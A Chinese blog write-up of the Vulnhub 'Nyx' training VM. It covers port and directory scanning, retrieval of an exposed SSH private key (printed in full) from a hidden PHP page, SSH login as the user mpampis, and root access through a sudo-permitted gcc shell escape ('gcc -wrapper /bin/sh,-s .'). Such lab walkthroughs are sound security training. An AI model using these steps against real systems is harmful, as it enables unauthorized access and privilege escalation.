首页 > 其他分享 >Vulnhub之Nyx靶机详细测试过程

Vulnhub之Nyx靶机详细测试过程

时间:2023-02-03 22:45:07浏览次数:42  
标签:Nyx http kali 56.194 192.168 Vulnhub 靶机 root

Nyx

作者: jason_huawen

靶机信息

名称:Nyx: 1

地址:

https://www.vulnhub.com/entry/nyx-1,535/

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:a4:46:78      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.194  08:00:27:f7:91:3e      1      60  PCS Systemtechnik GmbH          

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.194

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.194 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 08:47 EST
Nmap scan report for 192.168.56.194
Host is up (0.000069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc8b87f436cd7d0fd8f31615a947f10b (RSA)
|   256 b45c089602c6a80b01fd4968ddaafb3a (ECDSA)
|_  256 cbbf2293697660a47dc019f3c715e73c (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: nyx
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F7:91:3E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ curl http://192.168.56.194                 
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>nyx</title>
</head>
<body>
<body bgcolor="#000000">

<center>
<font color="#e60000">
<pre>                         
███▄▄▄▄   ▄██   ▄   ▀████    ▐████▀ 
███▀▀▀██▄ ███   ██▄   ███▌   ████▀  
███   ███ ███▄▄▄███    ███  ▐███    
███   ███ ▀▀▀▀▀▀███    ▀███▄███▀    
███   ███ ▄██   ███    ████▀██▄     
███   ███ ███   ███   ▐███  ▀███    
███   ███ ███   ███  ▄███     ███▄  
 ▀█   █▀   ▀█████▀  ████       ███▄ 
Happy pwning :D
</pre>
<font>
</center>

</body>
</html>

<!-- Dont waste your time looking into source codes/robots.txt etc , focus on real stuff -->
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ curl http://192.168.56.194/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.194 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ nikto -h http://192.168.56.194      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.194
+ Target Hostname:    192.168.56.194
+ Target Port:        80
+ Start Time:         2023-02-03 08:49:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 3c5, size: 5acde48676ca6, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-02-03 08:50:36 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ gobuster dir -u http://192.168.56.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.194
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,txt,php,html
[+] Timeout:                 10s
===============================================================
2023/02/03 08:51:04 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 965]
/key.php              (Status: 200) [Size: 287]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1098748 / 1102805 (99.63%)===============================================================
2023/02/03 08:53:06 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ dirb http://192.168.56.194

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Feb  3 08:53:18 2023
URL_BASE: http://192.168.56.194/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.194/ ----
+ http://192.168.56.194/index.html (CODE:200|SIZE:965)                                                                      
+ http://192.168.56.194/server-status (CODE:403|SIZE:279)                                                                   
                                                                                                                            
-----------------
END_TIME: Fri Feb  3 08:53:19 2023
DOWNLOADED: 4612 - FOUND: 2
                                              

发现了key.php文件,尝试SQL注入等方法都失败

参考其他人解法,用nmap的脚本进行扫描

──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ nmap -p 80 --script=http-enum 192.168.56.194                                                       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 09:08 EST
Nmap scan report for 192.168.56.194
Host is up (0.00036s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|_  /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability

Nmap done: 1 IP address (1 host up) scanned in 7.03 seconds

发现了一个特殊文件,访问该文件,为ssh 私钥

┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ curl http://192.168.56.194/d41d8cd98f00b204e9800998ecf8427e.php
<title>mpampis key</title>
<pre>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7T94TmbqiRlc6jGh6UOKyKVux+bYoskAdOybtgCfoh064CTHLTMT
HNnXWI8sT1Ml19svvVGnZZKmDTbS/7uOpgsmvO0pmqirCVo0UvD0YhKXVEwkTtmUvPBPAX
ucGRtefJcCtLWnSc4yMtzbYzSYEultUW5EfqqTwfjh48fxvLk1/kznO7EknxpLMupf6hJz
NbGLLbRwINeIjdC0k6iMdMrZ3n58Cho3kigNKSqcyBpkePE+RvnCBegtxBX/m1pUjPjYKY
zdZ0DROQyU3t7Wu6iX4TW688adHjAgXP7ERN0tL6RoJB9vHxO1GmGt5CLoJBYND1uLoTRe
p7xkIPwwgwAAA8iiu9/dorvf3QAAAAdzc2gtcnNhAAABAQDtP3hOZuqJGVzqMaHpQ4rIpW
7H5tiiyQB07Ju2AJ+iHTrgJMctMxMc2ddYjyxPUyXX2y+9UadlkqYNNtL/u46mCya87Sma
qKsJWjRS8PRiEpdUTCRO2ZS88E8Be5wZG158lwK0tadJzjIy3NtjNJgS6W1RbkR+qpPB+O
Hjx/G8uTX+TOc7sSSfGksy6l/qEnM1sYsttHAg14iN0LSTqIx0ytnefnwKGjeSKA0pKpzI
GmR48T5G+cIF6C3EFf+bWlSM+NgpjN1nQNE5DJTe3ta7qJfhNbrzxp0eMCBc/sRE3S0vpG
gkH28fE7UaYa3kIugkFg0PW4uhNF6nvGQg/DCDAAAAAwEAAQAAAQAaUzieOn07yTyuH+O/
Zmc37GNmew7+wR7z2m1MvLT54BRwWqRfN5OfV+y1Pu3Dv44rbX7WmwDgHG2gebzf84fYlN
QvkoFTT/Pqjb/QlDwJxdZU3D4LIcmHTYL2vyiLAKZzXK5ILv/pCKA5VJhjYaqeLpiauImR
JIxQsbUe+UixkATg7u3c/lkPH4p7POb7JJVbemKO07vzUSK3wzMWSukZs5ZZXKH8L5ypSy
CxPe4AUaO5IuXeKPeq45Q7lUvVKAFdxte438jup4YeyS7lbi2+BggJLt3W4jAlrWxaDhK3
/EICCIT8zLt+baltm/xrfiRM2OxTP2S/6/AQlkbSOaBBAAAAgQDTmKPk3pBpmR0tm5KmSK
6ubJkOfjcVwsLlZcVDHOcFIrgbNkEZPqqEnnRQD7BSBz0I05L1H8VgDR4ZkkgVqKmePhI9
Fs3NVsCasih8UubG2TTsGcvOalU+X6zagDiGWxxLNrQ81NBmCUBWPB/dFG+dUo9T0XigNQ
1lD1s4trUG6QAAAIEA/BlxOWPyLx4UHGO7RrrKEjWKpw2Ma6iRbQOo5HfmrJ+mZvUP+qBs
+Qgj3g+Qgt6y+EH67oxWeX/xTti1xHAc0Qx59181QrBFojp0XWtRumhASFC/TceBuP1fYe
DIZ6gYNXN/Pw7PFKStceO/Qhmee+K1/6XRwEvRSvXKG5a7sQ8AAACBAPDrM5bkjXYD9cq7
xfkT1t16YzqK9BmgFgSyOFQjtqFuLt4JtsQhPfip2QZkSCyPk8cVNx74Wvs4rxYl5pacmf
CR8v83WYMc6h4oBLmcxZsxMpaP8B/N7DZeS76A6idz+Cdj6BTmgMh7xFTXQOgB6Gh9LZmE
KXo/rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
</pre>

┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ vim id_rsa    
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ cat id_rsa                                                     
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7T94TmbqiRlc6jGh6UOKyKVux+bYoskAdOybtgCfoh064CTHLTMT
HNnXWI8sT1Ml19svvVGnZZKmDTbS/7uOpgsmvO0pmqirCVo0UvD0YhKXVEwkTtmUvPBPAX
ucGRtefJcCtLWnSc4yMtzbYzSYEultUW5EfqqTwfjh48fxvLk1/kznO7EknxpLMupf6hJz
NbGLLbRwINeIjdC0k6iMdMrZ3n58Cho3kigNKSqcyBpkePE+RvnCBegtxBX/m1pUjPjYKY
zdZ0DROQyU3t7Wu6iX4TW688adHjAgXP7ERN0tL6RoJB9vHxO1GmGt5CLoJBYND1uLoTRe
p7xkIPwwgwAAA8iiu9/dorvf3QAAAAdzc2gtcnNhAAABAQDtP3hOZuqJGVzqMaHpQ4rIpW
7H5tiiyQB07Ju2AJ+iHTrgJMctMxMc2ddYjyxPUyXX2y+9UadlkqYNNtL/u46mCya87Sma
qKsJWjRS8PRiEpdUTCRO2ZS88E8Be5wZG158lwK0tadJzjIy3NtjNJgS6W1RbkR+qpPB+O
Hjx/G8uTX+TOc7sSSfGksy6l/qEnM1sYsttHAg14iN0LSTqIx0ytnefnwKGjeSKA0pKpzI
GmR48T5G+cIF6C3EFf+bWlSM+NgpjN1nQNE5DJTe3ta7qJfhNbrzxp0eMCBc/sRE3S0vpG
gkH28fE7UaYa3kIugkFg0PW4uhNF6nvGQg/DCDAAAAAwEAAQAAAQAaUzieOn07yTyuH+O/
Zmc37GNmew7+wR7z2m1MvLT54BRwWqRfN5OfV+y1Pu3Dv44rbX7WmwDgHG2gebzf84fYlN
QvkoFTT/Pqjb/QlDwJxdZU3D4LIcmHTYL2vyiLAKZzXK5ILv/pCKA5VJhjYaqeLpiauImR
JIxQsbUe+UixkATg7u3c/lkPH4p7POb7JJVbemKO07vzUSK3wzMWSukZs5ZZXKH8L5ypSy
CxPe4AUaO5IuXeKPeq45Q7lUvVKAFdxte438jup4YeyS7lbi2+BggJLt3W4jAlrWxaDhK3
/EICCIT8zLt+baltm/xrfiRM2OxTP2S/6/AQlkbSOaBBAAAAgQDTmKPk3pBpmR0tm5KmSK
6ubJkOfjcVwsLlZcVDHOcFIrgbNkEZPqqEnnRQD7BSBz0I05L1H8VgDR4ZkkgVqKmePhI9
Fs3NVsCasih8UubG2TTsGcvOalU+X6zagDiGWxxLNrQ81NBmCUBWPB/dFG+dUo9T0XigNQ
1lD1s4trUG6QAAAIEA/BlxOWPyLx4UHGO7RrrKEjWKpw2Ma6iRbQOo5HfmrJ+mZvUP+qBs
+Qgj3g+Qgt6y+EH67oxWeX/xTti1xHAc0Qx59181QrBFojp0XWtRumhASFC/TceBuP1fYe
DIZ6gYNXN/Pw7PFKStceO/Qhmee+K1/6XRwEvRSvXKG5a7sQ8AAACBAPDrM5bkjXYD9cq7
xfkT1t16YzqK9BmgFgSyOFQjtqFuLt4JtsQhPfip2QZkSCyPk8cVNx74Wvs4rxYl5pacmf
CR8v83WYMc6h4oBLmcxZsxMpaP8B/N7DZeS76A6idz+Cdj6BTmgMh7xFTXQOgB6Gh9LZmE
KXo/rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ chmod 400 id_rsa 


而这个奇怪文件的title告诉我们用户名

┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ ssh -i id_rsa [email protected] 
The authenticity of host '192.168.56.194 (192.168.56.194)' can't be established.
ED25519 key fingerprint is SHA256:y+UuWVNQjou5NV3bhJKmkFBqomxtGR0c5ydJPwmIz+E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.194' (ED25519) to the list of known hosts.
Linux nyx 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
███▄▄▄▄   ▄██   ▄   ▀████    ▐████▀ 
███▀▀▀██▄ ███   ██▄   ███▌   ████▀  
███   ███ ███▄▄▄███    ███  ▐███    
███   ███ ▀▀▀▀▀▀███    ▀███▄███▀    
███   ███ ▄██   ███    ████▀██▄     
███   ███ ███   ███   ▐███  ▀███    
███   ███ ███   ███  ▄███     ███▄  
 ▀█   █▀   ▀█████▀  ████       ███▄ 
Last login: Fri Aug 14 19:15:05 2020 from 192.168.1.18
mpampis@nyx:~$ id
uid=1000(mpampis) gid=1000(mpampis) groups=1000(mpampis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

提权

将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本:

                                                                                                                             
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
Matching Defaults entries for mpampis on nyx:                                                                                 
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mpampis may run the following commands on nyx:
    (root) NOPASSWD: /usr/bin/gcc

mpampis@nyx:/tmp$ sudo /usr/bin/gcc -wrapper /bin/sh,-s .
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Aug 14  2020 .
drwxr-xr-x 18 root root 4.0K Aug 14  2020 ..
-rw-------  1 root root    0 Aug 14  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Aug 14  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root    0 Aug 14  2020 root.txt
-rw-r--r--  1 root root  168 Aug 14  2020 .wget-hsts
# cat root.txt
# 

经验教训

  1. 在扫描得到key.php文件后,认为这应该是突破口,但是尝试各种方法失败,应该想其他办法

  2. 本靶机利用到了nmap http-enum扫描脚本

标签:Nyx,http,kali,56.194,192.168,Vulnhub,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/17090622.html

相关文章

  • Vulnhub之Stapler靶机详细测试过程
    Stapler识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Stapler]└─$sudonetdiscover-ieth0-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|Screen......
  • vulnhub靶场之DIGITALWORLD.LOCAL: VENGEANCE
    准备:攻击机:虚拟机kali、本机win10。靶机:digitalworld.local:VENGEANCE,下载地址:https://download.vulnhub.com/digitalworld/VENGEANCE.7z,下载后直接vm打开即可。知识点......
  • Vulnhub之Bob靶机详细测试过程
    Bob作者:jason_huawen靶机信息名称:Bob:1.0.1地址:https://www.vulnhub.com/entry/bob-101,226/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Bob]└─$sudonetd......
  • vulnhub_matrix-breakout-2-morpheus
    前言靶机地址:matrix-breakout-2-morpheus攻击机:kali2022.3靶机:matrix-breakout-2-morpheus题目描述:这是《黑客帝国突围》系列的第二部,副标题为墨菲斯:1。它的主题是对......
  • vulnhub之sahu
    一、信息获取1、IP获取──(kali㉿kali)-[~]└─$sudonmap-sn192.168.62.129/24StartingNmap7.93(https://nmap.org)at2023-01-2922:47HKTNmapscanre......
  • vulnhub靶场-->MATRIX-BREAKOUT: 2 MORPHEUS
    靶机下载地址MATRIX-BREAKOUT:2MORPHEUS <点我下载开始打靶IP发现nmap扫描网段发现靶机ip:192.168.111.139端口发现对靶机进行常规端口扫描发现两个http端口......
  • vulnhub靶场 --> JANGOW: 1.0.1
    靶机下载地址JANGOW:1.0.1 <点我下载开始打靶IP发现nmap扫描网段发现靶机ip:192.168.111.140端口发现对靶机进行常规端口扫描访问网站访问80端口发现是个目录......
  • Vulnhub之Cheran EE靶机详细测试过程(需要特别注意靶机的网络模式)
    CheranEE靶机信息名称:Cheran:1地址:https://www.vulnhub.com/entry/cheran-1,521/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Cheran]└─$sudonetdiscover-i......
  • Vulnhub之Cherry靶机详细测试过程(获得Shell采取不同的方法)
    Cherry识别目标主机IP地址由于目标主机无法自动获取IP地址,参照本人另文首先解决该问题。─(kali㉿kali)-[~/Vulnhub/Cherry]└─$sudonetdiscover-ieth1-r192.16......
  • Vulnhub之Chill Hack靶机详细测试过程
    ChillHack作者:jason_huawen靶机信息名称:ChillHack:1地址:https://www.vulnhub.com/entry/chill-hack-1,622/识别目标主机IP地址由于目标主机无法自动获取IP地址......